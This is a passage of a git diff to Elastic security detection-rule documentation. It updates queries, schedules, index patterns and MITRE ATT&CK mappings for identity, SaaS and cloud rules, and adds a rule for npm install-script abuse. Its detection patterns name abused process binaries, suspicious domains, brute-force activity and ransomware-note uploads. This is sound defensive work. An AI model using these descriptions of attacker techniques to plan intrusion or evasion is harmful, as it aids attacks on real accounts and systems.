Domain: Cloud +* Data Source: Azure +* Data Source: Microsoft Entra ID +* Data Source: Microsoft Entra ID Protection Logs +* Data Source: Microsoft Entra ID Audit Logs +* Use Case: Identity and Access Audit +* Resources: Investigation Guide +* Tactic: Persistence + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Microsoft Entra ID Protection Alert and Device Registration* + + + +*Possible investigation steps* + + +- Identify the Risk Detection that triggered the event. A list with descriptions can be found https://docs.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#risk-types-and-detection[here]. +- Identify the user account involved and validate whether the suspicious activity is normal for that user. + - Consider the source IP address and geolocation for the involved user account. Do they look normal? + - Consider the device used to sign in. Is it registered and compliant? +- Investigate other alerts associated with the user account during the past 48 hours. +- Contact the account owner and confirm whether they are aware of this activity. +- Check if this operation was approved and performed according to the organization's change management policy. +- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services, and data accessed by the account in the last 24 hours. + + +*False positive analysis* + +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and device conditions. +- Consider the context of the user account and whether the activity is expected. For example, if the user is a developer or administrator, they may have legitimate reasons for accessing resources from various locations or devices. +- A Microsoft Entra ID Protection alert may be triggered by legitimate activities such as password resets, MFA changes, or device registrations. If the user is known to perform these actions regularly, it may not indicate a compromise. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Disable or limit the account during the investigation and response. +- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context: + - Identify the account role in the cloud environment. + - Assess the criticality of affected services and servers. + - Work with your IT team to identify and minimize the impact on users. + - Identify if the attacker is moving laterally and compromising other accounts, servers, or services. + - Identify any regulatory or legal ramifications related to this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions. +- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users. +- Consider enabling multi-factor authentication for users. +- Follow security best practices https://docs.microsoft.com/en-us/azure/security/fundamentals/identity-management-best-practices[outlined] by Microsoft. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +==== Rule query + + +[source, js] +---------------------------------- +sequence with maxspan=5m +[any where event.dataset == "azure.identity_protection"] by azure.identityprotection.properties.user_principal_name +[any where event.dataset == "azure.auditlogs" and event.action == "Register device"] by azure.auditlogs.properties.initiated_by.user.userPrincipalName + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Device Registration +** ID: T1098.005 +** Reference URL: https://attack.mitre.org/techniques/T1098/005/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc index d0dbb4980e..4ff74ea894 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-rare-authentication-requirement-for-principal-user.asciidoc @@ -35,7 +35,7 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -154,3 +154,11 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" ** Name: Password Spraying ** ID: T1110.003 ** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc index fa8d471576..374965345e 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-sign-in-brute-force-activity.asciidoc @@ -41,7 +41,7 @@ Identifies potential brute-force attacks targeting user accounts by analyzing fa * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 4 +*Version*: 5 *Rule authors*: @@ -104,7 +104,7 @@ This rule detects brute-force authentication activity in Entra ID sign-in logs. [source, js] ---------------------------------- -from logs-azure.signinlogs* +from logs-azure.signinlogs-* // Define a time window for grouping and maintain the original event timestamp | eval Esql.time_window_date_trunc = date_trunc(15 minutes, @timestamp) diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc index a714d569c5..c6493a0611 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-entra-id-user-reported-suspicious-activity.asciidoc @@ -34,7 +34,7 @@ Identifies suspicious activity reported by users in Microsoft Entra ID where use * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -117,3 +117,7 @@ event.dataset: "azure.auditlogs" ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc b/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc index e704531143..44f6587962 100644 --- a/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/microsoft-graph-first-occurrence-of-client-request.asciidoc @@ -33,7 +33,7 @@ This New Terms rule focuses on the first occurrence of a client application ID ( * Use Case: Identity and Access Audit * Tactic: Initial Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -123,3 +123,11 @@ event.dataset: "azure.graphactivitylogs" ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc index 9911ef4e2a..01cb51e54d 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-device-token-hashes-for-single-okta-session.asciidoc @@ -35,7 +35,7 @@ This rule detects when a specific Okta actor has multiple device token hashes fo * Domain: SaaS * Resources: Investigation Guide -*Version*: 307 +*Version*: 308 *Rule authors*: @@ -117,7 +117,7 @@ from logs-okta* "user.authentication.sso" ) and okta.actor.alternate_id != "system@okta.com" and - okta.actor.alternate_id rlike "[^@\s]+\@[^@\s]+" and + okta.actor.alternate_id rlike "[^@\\s]+\\@[^@\\s]+" and okta.authentication_context.external_session_id != "unknown" | keep event.action, diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc index 045e9b120a..3388c68979 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-microsoft-365-user-account-lockouts-in-short-time-window.asciidoc @@ -11,7 +11,7 @@ Detects a burst of Microsoft 365 user account lockouts within a short 5-minute w *Risk score*: 47 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -36,7 +36,7 @@ Detects a burst of Microsoft 365 user account lockouts within a short 5-minute w * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -160,3 +160,15 @@ from logs-o365.audit-* ** Name: Brute Force ** ID: T1110 ** Reference URL: https://attack.mitre.org/techniques/T1110/ +* Sub-technique: +** Name: Password Guessing +** ID: T1110.001 +** Reference URL: https://attack.mitre.org/techniques/T1110/001/ +* Sub-technique: +** Name: Password Spraying +** ID: T1110.003 +** Reference URL: https://attack.mitre.org/techniques/T1110/003/ +* Sub-technique: +** Name: Credential Stuffing +** ID: T1110.004 +** Reference URL: https://attack.mitre.org/techniques/T1110/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc index 879bb06b5b..8d01203934 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-client-address.asciidoc @@ -34,7 +34,7 @@ Detects when a certain threshold of Okta user authentication events are reported * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -118,7 +118,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action == "user.session.start" or event.action rlike "user\.authentication(.*)") and + (event.action == "user.session.start" or event.action like "user.authentication.*") and okta.outcome.reason == "INVALID_CREDENTIALS" | keep okta.client.ip, diff --git a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc index e5feeb913c..fca1a226d0 100644 --- a/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/multiple-okta-user-authentication-events-with-same-device-token-hash.asciidoc @@ -34,7 +34,7 @@ Detects when a high number of Okta user authentication events are reported for m * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -115,7 +115,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + (event.action like "user.authentication.*" or event.action == "user.session.start") and okta.debug_context.debug_data.dt_hash != "-" and okta.outcome.reason == "INVALID_CREDENTIALS" | keep diff --git a/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc index 750558e55a..91e87f5c8f 100644 --- a/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/network-activity-to-a-suspicious-top-level-domain.asciidoc @@ -42,7 +42,7 @@ Identifies DNS queries to commonly abused Top Level Domains by common LOLBINs or * Data Source: Crowdstrike * Data Source: Sysmon -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -106,7 +106,7 @@ network where host.os.type == "windows" and dns.question.name != null and "java.exe", "javaw.exe", "*.pif", "*.com", "*.scr") or (?process.code_signature.trusted == false or ?process.code_signature.exists == false) or ?process.code_signature.subject_name : ("AutoIt Consulting Ltd", "OpenJS Foundation", "Python Software Foundation") or - process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe") + ?process.executable : ("?:\\Users\\*.exe", "?:\\ProgramData\\*.exe") ) and dns.question.name regex """.*\.(top|buzz|xyz|rest|ml|cf|gq|ga|onion|monster|cyou|quest|cc|bar|cfd|click|cam|surf|tk|shop|club|icu|pw|ws|online|fun|life|boats|store|hair|skin|motorcycles|christmas|lol|makeup|mom|bond|beauty|biz|live|work|zip|country|accountant|date|party|science|loan|win|men|faith|review|racing|download|host)""" diff --git a/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc b/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc index 0ef8b0f5a0..e8fb7d4acf 100644 --- a/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/new-or-modified-federation-domain.asciidoc @@ -7,8 +7,8 @@ Identifies a new or modified federation domain, which can be used to create a tr *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: low @@ -37,7 +37,7 @@ Identifies a new or modified federation domain, which can be used to create a tr * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc b/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc new file mode 100644 index 0000000000..abf471168a --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/node-js-pre-or-post-install-script-execution.asciidoc @@ -0,0 +1,123 @@ +[[node-js-pre-or-post-install-script-execution]] +=== Node.js Pre or Post-Install Script Execution + +This rule detects the execution of Node.js pre or post-install scripts. These scripts are executed by the Node.js package manager (npm) during the installation of packages. Adversaries may abuse this technique to execute arbitrary commands on the system and establish persistence. This activity was observed in the wild as part of the Shai-Hulud worm. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/blog/shai-hulud-worm-npm-supply-chain-compromise + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=10s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name == "node" and process.args == "install"] by process.entity_id + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.parent.name == "node"] by process.parent.entity_id + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Create or Modify System Process +** ID: T1543 +** Reference URL: https://attack.mitre.org/techniques/T1543/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc index a6a494634d..0e7d58f0ba 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-email-reported-by-user-as-malware-or-phish.asciidoc @@ -7,8 +7,8 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Detects the occurrence of emails reported as Phishing or Malware by Users. Secur * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc index e427090865..1bd89d2f0d 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-excessive-single-sign-on-logon-errors.asciidoc @@ -7,8 +7,8 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. Exc *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. Exc *Runs every*: 5m -*Searches indices from*: now-20m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -30,7 +30,7 @@ Identifies accounts with a high number of single sign-on (SSO) logon errors. Exc * Tactic: Credential Access * Resources: Investigation Guide -*Version*: 210 +*Version*: 211 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc b/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc index 07ddad4afd..c94e232d5d 100644 --- a/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/o365-mailbox-audit-logging-bypass.asciidoc @@ -7,8 +7,8 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: medium @@ -16,7 +16,7 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Detects the occurrence of mailbox audit bypass associations. The mailbox audit i * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -118,3 +118,7 @@ event.dataset:o365.audit and event.provider:Exchange and event.action:Set-Mailbo ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc b/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc index 0e5d4d3a47..4beb8117db 100644 --- a/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/oidc-discovery-url-changed-in-entra-id.asciidoc @@ -11,7 +11,7 @@ Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Auth *Risk score*: 73 -*Runs every*: 5m +*Runs every*: 8m *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) @@ -32,7 +32,7 @@ Detects a change to the OpenID Connect (OIDC) discovery URL in the Entra ID Auth * Tactic: Persistence * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc b/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc index c0b09ee704..c97f107bbc 100644 --- a/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/okta-user-sessions-started-from-different-geolocations.asciidoc @@ -34,7 +34,7 @@ Detects when a specific Okta actor has multiple sessions started from different * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 307 +*Version*: 308 *Rule authors*: @@ -109,7 +109,7 @@ The Okta Fleet integration, Filebeat module, or similarly structured data is req from logs-okta* | where event.dataset == "okta.system" and - (event.action rlike "user\.authentication(.*)" or event.action == "user.session.start") and + (event.action like "user.authentication.*" or event.action == "user.session.start") and okta.security_context.is_proxy != true and okta.actor.id != "unknown" and event.outcome == "success" diff --git a/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc b/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc index 70653f5213..bad5ff3623 100644 --- a/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/onedrive-malware-file-upload.asciidoc @@ -7,8 +7,8 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware *Rule indices*: +* logs-o365.audit-* * filebeat-* -* logs-o365* *Severity*: high @@ -16,7 +16,7 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware *Runs every*: 5m -*Searches indices from*: now-30m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the occurence of files uploaded to OneDrive being detected as Malware * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 209 +*Version*: 210 *Rule authors*: @@ -114,3 +114,15 @@ event.dataset:o365.audit and event.provider:OneDrive and event.code:SharePointFi ** Name: Taint Shared Content ** ID: T1080 ** Reference URL: https://attack.mitre.org/techniques/T1080/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ +* Sub-technique: +** Name: Upload Malware +** ID: T1608.001 +** Reference URL: https://attack.mitre.org/techniques/T1608/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc index 761a96214c..3516e330ff 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-aws-s3-bucket-ransomware-note-uploaded.asciidoc @@ -1,11 +1,14 @@ [[potential-aws-s3-bucket-ransomware-note-uploaded]] === Potential AWS S3 Bucket Ransomware Note Uploaded -Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. +Identifies potential ransomware note being uploaded to an AWS S3 bucket. This rule detects the PutObject S3 API call with a common ransomware note file name or extension such as ransom or .lock. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. -*Rule type*: esql +*Rule type*: eql -*Rule indices*: None +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* *Severity*: medium @@ -13,13 +16,12 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru *Runs every*: 5m -*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 *References*: -* https://s3.amazonaws.com/bizzabo.file.upload/PtZzA0eFQwV2RA5ysNeo_ERMETIC%20REPORT%20-%20AWS%20S3%20Ransomware%20Exposure%20in%20the%20Wild.pdf * https://stratus-red-team.cloud/attack-techniques/AWS/aws.impact.s3-ransomware-batch-deletion/ * https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ @@ -33,7 +35,7 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru * Tactic: Impact * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: @@ -49,95 +51,95 @@ Identifies potential ransomware note being uploaded to an AWS S3 bucket. This ru *Triage and analysis* +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + *Investigating Potential AWS S3 Bucket Ransomware Note Uploaded* -This rule detects the `PutObject` S3 API call with a common ransomware note file extension such as `.ransom`, or `.lock`. Adversaries with access to a misconfigured S3 bucket may retrieve, delete, and replace objects with ransom notes to extort victims. +This rule detects a successful `PutObject` to S3 where the object key matches common ransomware-note patterns (for example, `readme`, `how_to_decrypt`, `decrypt_instructions`, `ransom`, `lock`). Attackers who obtain credentials or abuse overly-permissive bucket policies can upload ransom notes (often after deleting or encrypting data). *Possible Investigation Steps:* - -- **Identify the Actor**: Review the `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` fields to identify who performed the action. Verify if this actor typically performs such actions and if they have the necessary permissions. -- **Review the Request Details**: Examine the `aws.cloudtrail.request_parameters` to understand the specific details of the `PutObject` action. Look for any unusual parameters that could suggest unauthorized or malicious modifications. -- **Analyze the Source of the Request**: Investigate the `source.ip` and `source.geo` fields to determine the geographical origin of the request. An external or unexpected location might indicate compromised credentials or unauthorized access. -- **Contextualize with Timestamp**: Use the `@timestamp` field to check when the ransom note was uploaded. Changes during non-business hours or outside regular maintenance windows might require further scrutiny. -- **Inspect the Ransom Note**: Review the `aws.cloudtrail.request_parameters` for the `PutObject` action to identify the characteristics of the uploaded ransom note. Look for common ransomware file extensions such as `.txt`, `.note`, `.ransom`, or `.html`. -- **Correlate with Other Activities**: Search for related CloudTrail events before and after this action to see if the same actor or IP address engaged in other potentially suspicious activities. -- **Check for Object Deletion or Access**: Look for `DeleteObject`, `DeleteObjects`, or `GetObject` API calls to the same S3 bucket that may indicate the adversary accessing and destroying objects before placing the ransom note. +- **Confirm the actor and session details.** Review `aws.cloudtrail.user_identity.*` (ARN, type, access key, session context), `source.ip`, `user.agent`, and `tls.client.server_name` to identify *who* performed the upload and *from where*. Validate whether this principal typically writes to this bucket. +- **Inspect the object key and bucket context.** From `aws.cloudtrail.request_parameters`, capture the exact `key` and `bucketName`. Check whether the key is publicly readable (ACL), whether the bucket is internet-exposed, and whether replication or lifecycle rules could propagate or remove related objects. +- **Pivot to related S3 activity around the same time.** Look for `DeleteObject`/`DeleteObjects`, mass `PutObject` spikes, `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, and `PutBucketLifecycleConfiguration` events on the same bucket or by the same actor to determine if data destruction, policy tampering, or guard-rail changes occurred. +- **Assess blast radius across the account.** Search recent CloudTrail for the same actor/IP touching other buckets, KMS keys used by those buckets, and IAM changes (new access keys, policy attachments, role assumptions) that could indicate broader compromise paths consistent with ransomware playbooks. +- **Check protections and recovery posture on the bucket.** Verify whether S3 Versioning and (if in use) Object Lock legal hold are enabled; note prior versions available for the affected key, and whether lifecycle rules might expire them. +- **Correlate with threat signals.** Review other related alerts, 